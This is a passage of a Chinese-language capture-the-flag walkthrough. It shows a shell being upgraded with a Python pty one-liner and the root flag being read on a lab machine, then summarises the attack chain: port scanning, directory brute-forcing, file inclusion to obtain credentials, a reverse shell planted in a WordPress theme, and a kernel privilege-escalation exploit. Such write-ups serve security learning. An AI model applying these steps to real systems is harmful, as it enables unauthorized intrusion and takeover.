1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000link/ether 00:0c:29:5c:c7:58 brd ff:ff:ff:ff:ff:ffinet 192.168.50.153/24 brd 192.168.50.255 scope global dynamic ens33valid_lft 1343sec preferred_lft 1343secinet6 fe80::dc85:1101:d755:d6fc/64 scope link valid_lft forever preferred_lft forever

用 python 得到交互性更好的 shell
python -c “import pty;pyt.spawn(‘/bin/bash’)”

python -c "import pty;pty.spawn('/bin/bash')"
root@ubuntu:/tmp#

拿一下 root 的 flag

root@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:/root# ls -liah
ls -liah
total 92K
917506 drwx------  5 root root 4.0K Aug 31  2019 .2 drwxr-xr-x 24 root root 4.0K Aug 29  2019 ..
964588 -rw-------  1 root root 8.4K Sep  1  2019 .bash_history
917598 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
917597 drwx------  3 root root 4.0K Aug 30  2019 .cache
969791 -rw-------  1 root root  137 Aug 30  2019 .mysql_history
964098 drwxr-xr-x  2 root root 4.0K Aug 29  2019 .nano
917599 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
969796 -rw-r--r--  1 root root   66 Aug 31  2019 .selected_editor
969793 -rwxr-xr-x  1 root root  14K Aug 30  2019 enc
969795 -rw-r--r--  1 root root  305 Aug 30  2019 enc.cpp
969797 -rw-r--r--  1 root root  237 Aug 30  2019 enc.txt
969798 -rw-r--r--  1 root root  123 Aug 30  2019 key.txt
969794 -rw-r--r--  1 root root   33 Aug 30  2019 root.txt
969780 -rw-r--r--  1 root root  805 Aug 30  2019 sql.py
969790 -rwxr-xr-x  1 root root  442 Aug 31  2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30  2019 wfuzz
964464 -rw-r--r--  1 root root  170 Aug 29  2019 wordpress.sql
root@ubuntu:/root# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root#

总结

nmap扫描，得到 22 和 80
80 的内容只有一张图片
执行目录爆破，指定扩展名php, txt, zip 搜索
使用 fuzz 模糊测试，找到参数，使用参数文件包含，拿到用户名和密码
登录word press 的后台
在主题中写一个反弹shell，然后尝试提权，用户是www-data
使用uname -a 查看版本，在 searchsploit 中找到了内核提权漏洞
提权并用 python 升级 shell
结束

似乎还有另一种提权的方法…